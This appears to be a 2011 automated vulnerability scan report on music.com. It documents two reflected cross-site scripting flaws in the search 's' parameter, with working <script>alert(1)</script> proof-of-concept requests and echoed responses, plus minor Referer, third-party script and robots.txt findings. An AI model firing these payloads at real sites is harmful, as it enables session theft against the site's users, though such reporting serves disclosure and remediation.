XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, music.com

Report generated by XSS.CX at Mon Sep 05 20:45:12 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in music.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.1. http://music.com/ [s parameter]

1.2. http://music.com/ [s parameter]

2. Cross-domain Referer leakage

3. Cross-domain script include

4. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://music.com/ [s parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://music.com
Path:   /

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 573c7"><script>alert(1)</script>e20434f873d was submitted in the s parameter. This input was echoed as 573c7\"><script>alert(1)</script>e20434f873d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xss573c7"><script>alert(1)</script>e20434f873d&as_values_097= HTTP/1.1
Host: music.com
Proxy-Connection: keep-alive
Referer: http://music.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-938878302-1315276258830; __utma=229327232.1058145520.1315276259.1315276259.1315276259.1; __utmb=229327232.1.10.1315276259; __utmc=229327232; __utmz=229327232.1315276259.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=music; ym_pop_freq_expiration1962968=Wed, 07 Sep 2011 02:30:59 GMT; ym_pop_freq1962968=1; _chartbeat2=hz9at6jixn61wspt

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 05 Sep 2011 21:34:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Cookie
X-Pingback: http://music.com/xmlrpc.php
Cache-Control: public
Content-Length: 16209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--[if lt IE 7 ]><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:o
...[SNIP]...
<a href="http://music.com/?s=xss573c7\"><script>alert(1)</script>e20434f873d&Filter=all">
...[SNIP]...

1.2. http://music.com/ [s parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://music.com
Path:   /

Issue detail

The value of the s request parameter is copied into the HTML document as plain text between tags. The payload cdc07<script>alert(1)</script>613eb9768a1 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xsscdc07<script>alert(1)</script>613eb9768a1&as_values_097= HTTP/1.1
Host: music.com
Proxy-Connection: keep-alive
Referer: http://music.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-938878302-1315276258830; __utma=229327232.1058145520.1315276259.1315276259.1315276259.1; __utmb=229327232.1.10.1315276259; __utmc=229327232; __utmz=229327232.1315276259.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=music; ym_pop_freq_expiration1962968=Wed, 07 Sep 2011 02:30:59 GMT; ym_pop_freq1962968=1; _chartbeat2=hz9at6jixn61wspt

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 05 Sep 2011 21:34:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Cookie
X-Pingback: http://music.com/xmlrpc.php
Cache-Control: public
Content-Length: 16173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--[if lt IE 7 ]><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:o
...[SNIP]...
<span class="emph">xsscdc07<script>alert(1)</script>613eb9768a1</span>
...[SNIP]...

2. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?s=xss&as_values_097= HTTP/1.1
Host: music.com
Proxy-Connection: keep-alive
Referer: http://music.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-938878302-1315276258830; __utma=229327232.1058145520.1315276259.1315276259.1315276259.1; __utmb=229327232.1.10.1315276259; __utmc=229327232; __utmz=229327232.1315276259.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=music; ym_pop_freq_expiration1962968=Wed, 07 Sep 2011 02:30:59 GMT; ym_pop_freq1962968=1; _chartbeat2=hz9at6jixn61wspt

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 05 Sep 2011 21:34:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Cookie
X-Pingback: http://music.com/xmlrpc.php
WP-Super-Cache: Served legacy cache file
Cache-Control: public
Content-Length: 15932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--[if lt IE 7 ]><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:o
...[SNIP]...
<![endif]-->
       <link rel="profile" href="http://gmpg.org/xfn/11" />
       <link rel="stylesheet" href="http://cdn.music.com/wp-content/themes/music/style.css" />
...[SNIP]...
</script>
<script type='text/javascript' src='http://connect.facebook.net/en_US/all.js?ver=0.4#xfbml=1'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       
       <script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="twitterWrapperHoverDiv"><a id="twitter-chicklet" href="http://www.twitter.com/musicdotcom" target="_blank" title="Music.com @ Twitter.com" ><img src="http://cdn.music.com/wp-content/themes/music/images/twitter.gif" alt="Music.com @ Twitter.com" />
...[SNIP]...
<div id="facebookWrapperHoverDiv"><a href="http://www.facebook.com/pages/Musiccom/62324003290" target="_blank" title="Music.com @ Facebook.com"><img src="http://cdn.music.com/wp-content/themes/music/images/facebook.gif" alt="Music.com @ Facebook.com" />
...[SNIP]...
<br/>
                                       <a id="foot-credit" href="http://uvisionconsulting.com/" title="Powered by UVision Labs" rel="">Powered by UVision Labs</a>
...[SNIP]...
<p><img alt="Clicky" width="1" height="1" src="http://in.getclicky.com/66434497ns.gif" /></p>
...[SNIP]...

3. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET / HTTP/1.1
Host: music.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=music
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 05 Sep 2011 21:31:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding, Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Cache-Control: public
Content-Length: 41201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--[if lt IE 7 ]><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:o
...[SNIP]...
</script>
<script type='text/javascript' src='http://connect.facebook.net/en_US/all.js?ver=0.4#xfbml=1'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       
       <script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.undertone.com/js/ajs.js"></script>
...[SNIP]...
<!-- BEGIN STANDARD TAG - popup or popunder - ROS: MUSE - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=pop&ad_size=0x0&section=1962968&banned_pop_types=28&pop_times=1&pop_frequency=86400"></SCRIPT>
...[SNIP]...

4. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: music.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Vary: Cookie
Cache-Control: public
Content-Type: text/plain; charset=utf-8
Date: Mon, 05 Sep 2011 21:31:01 GMT
X-Pingback: http://music.com/xmlrpc.php
Connection: close
X-Powered-By: PHP/5.3.8

User-agent: *
Disallow:

Report generated by XSS.CX at Mon Sep 05 20:45:12 GMT-06:00 2011.